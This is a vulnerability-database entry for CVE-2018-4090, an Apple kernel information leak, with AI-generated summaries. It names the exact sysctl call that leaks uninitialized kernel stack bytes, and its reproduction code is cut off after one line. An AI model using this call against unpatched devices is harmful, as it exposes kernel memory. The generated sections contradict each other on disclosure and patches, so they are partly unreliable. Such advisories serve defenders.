CVE-2018-4090
Description
A kernel memory-read restriction bypass in Apple iOS, macOS, tvOS, and watchOS allows a crafted app to read protected kernel memory.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A kernel memory-read restriction bypass in Apple iOS, macOS, tvOS, and watchOS allows a crafted app to read protected kernel memory.
Vulnerability
CVE-2018-4090 is a kernel memory-read restriction bypass in the Kernel component of Apple iOS before 11.2.5, macOS before 10.13.3, tvOS before 11.2.5, and watchOS before 4.2.2. The vulnerability allows a crafted app to bypass intended memory-read restrictions, potentially exposing sensitive kernel memory. The issue is part of a set of vulnerabilities addressed in the January 23, 2018 security updates for all four operating systems [1][2][3][4].
Exploitation
Exploitation requires an attacker to execute a crafted app on the target device. No other special privileges or network access are necessary beyond the ability to run a malicious app. The attacker then uses the app to trigger the bypass and read memory that should be restricted. The exact mechanism is not publicly detailed by Apple [1][2][3][4].
Impact
Successful exploitation allows an attacker to read restricted kernel memory, bypassing the intended memory-read restrictions. This can lead to disclosure of sensitive information, including credentials or other secrets stored in kernel memory. The attacker gains only read access, not arbitrary code execution or modification of memory, unless combined with other vulnerabilities [1][2][3][4].
Mitigation
Apple released fixes in the following updates: iOS 11.2.5, macOS High Sierra 10.13.3 (and Security Update 2018-001 for Sierra and El Capitan), tvOS 11.2.5, and watchOS 4.2.2, all on January 23, 2018. Users should update to these versions. No workarounds are available for unpatched devices [1][2][3][4].
- About the security content of macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan - Apple Support
- About the security content of iOS 11.2.5 - Apple Support
- About the security content of tvOS 11.2.5 - Apple Support
- About the security content of watchOS 4.2.2 - Apple Support
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
4- Range: <11.2.5
- Range: <10.13.3
- Range: <4.2.2
- Range: <11.2.5
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Uninitialized struct padding byte in `sysctl_vfs_generic_conf()` leaks kernel stack memory to user space."
Attack vector
An attacker with the ability to run a crafted app on the system calls `sysctl()` with the name `{ CTL_VFS, VFS_GENERIC, VFS_CONF, 0x17 }` to read a `struct vfsconf` [ref_id=1]. The kernel copies the entire structure — including the uninitialized padding byte between `vfc_name` and `vfc_typenum` — to user space via `SYSCTL_OUT` [ref_id=1]. Because the padding byte is never zeroed, it leaks whatever kernel stack data happens to occupy that location, allowing the attacker to bypass intended memory-read restrictions [ref_id=1].
Affected code
The vulnerability is in the `sysctl_vfs_generic_conf()` function within the macOS kernel, which handles the `vfs.generic.conf.*` sysctls. The function copies a `struct vfsconf` to user space via `SYSCTL_OUT(req, &vfsc, sizeof(struct vfsconf))` [ref_id=1]. The `struct vfsconf` contains a `char vfc_name[MFSNAMELEN]` field (15 bytes) followed by `int vfc_typenum`, creating one uninitialized padding byte between them that is never zeroed before being copied out [ref_id=1].
What the fix does
The advisory does not include a patch, but the root cause is clear: the `struct vfsconf` has a one-byte padding gap between `vfc_name` (15 bytes) and `vfc_typenum` (4-byte int) that is never initialized before being copied to user space [ref_id=1]. A proper fix would zero-initialize the entire `struct vfsconf` (e.g., using `memset(&vfsc, 0, sizeof(vfsc))`) before populating its fields, or explicitly zero the padding byte. Apple addressed this in iOS 11.2.5, macOS 10.13.3, tvOS 11.2.5, and watchOS 4.2.2.
Preconditions
- inputAttacker must be able to execute a crafted app on the affected system
- configThe sysctl vfs.generic.conf.* interface must be accessible (default on macOS/iOS)
Reproduction
Compile and run the following program on an affected macOS system (e.g., 10.13.0):
```c #include
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
8- www.exploit-db.com/exploits/43923/mitreexploitx_refsource_EXPLOIT-DB
- www.securityfocus.com/bid/102782mitrevdb-entryx_refsource_BID
- www.securitytracker.com/id/1040265mitrevdb-entryx_refsource_SECTRACK
- www.securitytracker.com/id/1040267mitrevdb-entryx_refsource_SECTRACK
- support.apple.com/HT208462mitrex_refsource_CONFIRM
- support.apple.com/HT208463mitrex_refsource_CONFIRM
- support.apple.com/HT208464mitrex_refsource_CONFIRM
- support.apple.com/HT208465mitrex_refsource_CONFIRM
News mentions
0No linked articles in our index yet.